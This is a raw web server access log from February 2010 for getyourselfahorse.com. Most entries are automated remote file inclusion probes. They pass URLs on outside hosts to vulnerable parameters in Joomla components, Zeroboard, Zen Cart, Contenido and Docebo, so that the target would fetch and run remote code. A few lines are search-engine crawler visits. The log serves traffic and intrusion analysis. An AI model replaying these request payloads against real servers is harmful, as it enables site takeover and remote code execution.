220.73.144.196 - - [05/Feb/2010:19:43:21 -0800] "GET /logs/access_100130.log%20%20/write_update.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
143.248.146.168 - - [05/Feb/2010:19:43:29 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://musicadelibreria.net/footer? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
143.248.146.168 - - [05/Feb/2010:19:43:29 -0800] "GET //bbs/delete_all.php?board_skin_path=http://musicadelibreria.net/footer? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
143.248.146.168 - - [05/Feb/2010:19:43:36 -0800] "GET /logs/access.log///bbs/delete_all.php?board_skin_path=http://musicadelibreria.net/footer? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:19:44:23 -0800] "GET /logs/access_100116.log%20%20/write_update.php?board_skin_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:19:44:25 -0800] "GET /logs/access_100116.log%20%20/write_update.php?board_skin_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
95.211.7.129 - - [05/Feb/2010:19:44:29 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
95.211.7.129 - - [05/Feb/2010:19:44:29 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
95.211.7.129 - - [05/Feb/2010:19:44:29 -0800] "GET /logs/access_100116.log%20%20//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
95.211.7.129 - - [05/Feb/2010:19:44:37 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
95.211.7.129 - - [05/Feb/2010:19:44:37 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
95.211.7.129 - - [05/Feb/2010:19:44:38 -0800] "GET /logs/access_100116.log%20%20//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
84.38.160.77 - - [05/Feb/2010:19:45:41 -0800] "GET /errors.php?error=http://www.cashondemand.co.za/templates/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.getyourselfahorse.com"
84.38.160.77 - - [05/Feb/2010:19:45:41 -0800] "GET /logs/access_100123.log//errors.php?error=http://www.cashondemand.co.za/templates/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.getyourselfahorse.com"
84.38.160.77 - - [05/Feb/2010:19:45:41 -0800] "GET /logs//errors.php?error=http://www.cashondemand.co.za/templates/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.getyourselfahorse.com"
84.38.160.77 - - [05/Feb/2010:19:47:34 -0800] "GET /logs/access_100130.log//errors.php?error=http://www.cashondemand.co.za/templates/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.getyourselfahorse.com"
218.38.136.125 - - [05/Feb/2010:19:48:24 -0800] "GET /logs/access_091024.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.195.113.236 - - [05/Feb/2010:19:49:51 -0800] "GET /?M=D HTTP/1.0" 200 899 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
67.195.113.236 - - [05/Feb/2010:19:52:44 -0800] "GET /logs/?N=A HTTP/1.0" 200 1208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
66.7.219.40 - - [05/Feb/2010:19:59:32 -0800] "GET /logs/access_100116.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
66.7.219.40 - - [05/Feb/2010:19:59:32 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
66.7.219.40 - - [05/Feb/2010:19:59:32 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
66.7.219.40 - - [05/Feb/2010:20:00:09 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.7.219.40 - - [05/Feb/2010:20:00:09 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.7.219.40 - - [05/Feb/2010:20:00:09 -0800] "GET /logs/access_100123.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:05:57 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:05:57 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:05:57 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:05:58 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:05:58 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:05:59 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:01 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:01 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:01 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:01 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:02 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:02 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:05 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:05 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:05 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:06 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:06 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:06 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:10 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:10 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:11 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:12 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:12 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:06:12 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.7.219.40 - - [05/Feb/2010:20:06:30 -0800] "GET /logs/access_100116.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
66.7.219.40 - - [05/Feb/2010:20:06:38 -0800] "GET /logs/access_100123.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [05/Feb/2010:20:11:28 -0800] "GET /logs/access_100123.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [05/Feb/2010:20:11:28 -0800] "GET /logs/access_100123.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [05/Feb/2010:20:11:28 -0800] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [05/Feb/2010:20:11:28 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [05/Feb/2010:20:11:28 -0800] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [05/Feb/2010:20:11:28 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [05/Feb/2010:20:16:31 -0800] "GET /logs/access.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [05/Feb/2010:20:16:58 -0800] "GET /logs/access.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:17:28 -0800] "GET /logs/access_091121.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:17:33 -0800] "GET /logs/access_091121.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
60.251.165.181 - - [05/Feb/2010:20:17:33 -0800] "GET /logs/access_100123.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
60.251.165.181 - - [05/Feb/2010:20:17:33 -0800] "GET /logs//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
60.251.165.181 - - [05/Feb/2010:20:17:33 -0800] "GET /docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:17:47 -0800] "GET /logs/access_091121.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:17:52 -0800] "GET /logs/access_091121.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:17:53 -0800] "GET /logs/access_091121.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:17:58 -0800] "GET /logs/access_091121.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.180.124.146 - - [05/Feb/2010:20:18:00 -0800] "GET /logs/access_091121.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.175.91.26 - - [05/Feb/2010:20:19:54 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.175.91.26 - - [05/Feb/2010:20:19:54 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.175.91.26 - - [05/Feb/2010:20:19:54 -0800] "GET /logs/access_100130.log%20%20//bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.175.91.26 - - [05/Feb/2010:20:22:47 -0800] "GET /logs/access_100116.log%20%20//bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
60.251.165.181 - - [05/Feb/2010:20:27:03 -0800] "GET /logs/access_100123.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
201.93.165.28 - - [05/Feb/2010:20:28:18 -0800] "GET /logs/access_100123.log/////component/com_sef/admin.sef.php?mosConfig.absolute.path=http://www.study.de/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.getyourselfahorse.com"
201.93.165.28 - - [05/Feb/2010:20:28:20 -0800] "GET /logs/////component/com_sef/admin.sef.php?mosConfig.absolute.path=http://www.study.de/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.getyourselfahorse.com"
201.93.165.28 - - [05/Feb/2010:20:28:20 -0800] "GET ////component/com_sef/admin.sef.php?mosConfig.absolute.path=http://www.study.de/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.getyourselfahorse.com"
69.175.91.26 - - [05/Feb/2010:20:28:25 -0800] "GET /logs/access_100130.log//bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
201.93.165.28 - - [05/Feb/2010:20:28:41 -0800] "GET /logs/////component/com_sef/admin.sef.php?mosConfig.absolute.path=http://www.study.de/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.getyourselfahorse.com"
201.93.165.28 - - [05/Feb/2010:20:28:41 -0800] "GET /logs/access_100130.log/////component/com_sef/admin.sef.php?mosConfig.absolute.path=http://www.study.de/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.getyourselfahorse.com"
201.93.165.28 - - [05/Feb/2010:20:28:41 -0800] "GET ////component/com_sef/admin.sef.php?mosConfig.absolute.path=http://www.study.de/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.getyourselfahorse.com"
201.93.165.28 - - [05/Feb/2010:20:28:57 -0800] "GET /logs/access_100123.log/////component/com_sef/admin.sef.php?mosConfig.absolute.path=http://study.de/idrose.txt%0D? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.getyourselfahorse.com"
201.93.165.28 - - [05/Feb/2010:20:28:57 -0800] "GET ////component/com_sef/admin.sef.php?mosConfig.absolute.path=http://study.de/idrose.txt%0D? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.getyourselfahorse.com"
201.93.165.28 - - [05/Feb/2010:20:28:57 -0800] "GET /logs/////component/com_sef/admin.sef.php?mosConfig.absolute.path=http://study.de/idrose.txt%0D? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.getyourselfahorse.com"
201.93.165.28 - - [05/Feb/2010:20:29:31 -0800] "GET /logs/access_100130.log/////component/com_sef/admin.sef.php?mosConfig.absolute.path=http://www.study.de/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.getyourselfahorse.com"
69.175.91.26 - - [05/Feb/2010:20:30:38 -0800] "GET /logs/access_100116.log//bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:20:35:03 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:20:35:03 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:20:35:03 -0800] "GET /logs/access_100130.log//bbs/write_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:20:35:28 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:20:36:07 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:20:36:07 -0800] "GET /logs/access_100123.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:20:36:07 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:20:38:00 -0800] "GET /logs/access_100130.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.250.252.242 - - [05/Feb/2010:20:39:43 -0800] "GET /logs/access.log HTTP/1.1" 200 97619 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:20:42:43 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:20:42:43 -0800] "GET /logs/access_100123.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:20:42:43 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:20:44:16 -0800] "GET /logs/access_100130.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
201.93.165.28 - - [05/Feb/2010:20:45:02 -0800] "GET /logs/////component/com_lmo/config.lmo.php?mosConfig.absolute.path=http://www.study.de/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.getyourselfahorse.com"
201.93.165.28 - - [05/Feb/2010:20:45:02 -0800] "GET /logs/access_100130.log/////component/com_lmo/config.lmo.php?mosConfig.absolute.path=http://www.study.de/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.getyourselfahorse.com"
201.93.165.28 - - [05/Feb/2010:20:45:02 -0800] "GET ////component/com_lmo/config.lmo.php?mosConfig.absolute.path=http://www.study.de/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.getyourselfahorse.com"
